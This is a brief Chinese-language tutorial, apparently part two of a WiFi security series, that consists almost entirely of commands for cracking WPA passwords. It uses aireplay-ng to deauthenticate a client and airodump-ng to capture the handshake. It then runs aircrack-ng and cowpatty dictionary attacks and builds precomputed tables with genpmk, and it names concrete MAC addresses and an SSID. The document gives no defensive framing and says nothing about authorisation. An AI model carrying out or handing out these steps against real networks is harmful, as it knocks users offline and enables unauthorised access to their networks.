无线WIFI安全(二)
无线密码破解
DEAUTHENTICATION
airodump-ng wlan0mon –bssid 目标BSSID
使用aireplay-ng -0 0 -a <AP MAC> -c <客户端MAC> 网卡名称
使目标强制下线,同时监听目标BSSID数据包
aireplay-ng -0 0 -a E6:93:A5:E3:72:21 -c 88:B1:11:BE:81:83 wlan0mon
airodump-ng wlan0mon -c 10 –bssid E6:93:A5:E3:72:21 -w nex.cap
同时,当前目录下生成抓取的握手数据包
AIROLIB破解无线密码
aircrack-ng –w 字典 抓包流量.cap
cowpatty -r nex.cap-01.cap -f password.lst -s ‘vivo NEX S’ (如果SSID包含空格,那么使用单引号,如果不包含空格,则不需要单引号)
使用彩虹表进行破解
使用genpmk -f password.lst -d nexhash.lst -s ‘vivo NEX S’生成彩虹表
cowpatty -r nex.cap-01.cap -d nexhash.lst -s ‘vivo NEX S’